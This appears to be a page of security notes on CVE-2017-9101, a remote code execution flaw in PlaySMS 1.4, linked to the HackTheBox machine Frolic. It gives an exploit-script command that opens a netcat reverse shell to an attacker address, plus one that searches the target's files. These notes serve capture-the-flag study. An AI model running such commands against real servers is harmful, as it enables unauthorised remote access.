CVE-2017-9101

PlaySMS 1.4 - Remote Code Execution

PlaySMS 1.4 - Remote Code Execution - `PHP` - API

Vulnerability --> import.php

import.php (aka the Phonebook import feature) in PlaySMS 1.4 allows remote code execution via vectors involving the User-Agent HTTP header and PHP code in the name of a file.

Score: CVSS v2.0: 7.5 // CVSS v3.x: 9.8

Shows on:

HTB-Frolic

POC:

#Reverse Shell

python3 playsmshell.py --password 'idkwhatispass' --url 'http://forlic.htb:9999/playsms/index.php?app=main&inc=feature_phonebook&op=phonebook_list' -c '/bin/sh -i 2>&1|nc 10.10.14.11 4444'

#SUID Enumeration
python3 playsmshell.py --password 'idkwhatispass' --url 'http://forlic.htb:9999/playsms/index.php?app=main&inc=feature_phonebook&op=phonebook_list' -c 'find / -name user.txt 2>/dev/null'

Resources:

PreviousCVE-2018-1133 NextCVE-2016-4971

Last updated 1 year ago

PlaySMS 1.4 - Remote Code Execution - PHP - API

POC:

Resources:

PlaySMS 1.4 - Remote Code Execution - PHP - API

POC:

Resources:

PlaySMS 1.4 - Remote Code Execution - `PHP` - API

PlaySMS 1.4 - Remote Code Execution - `PHP` - API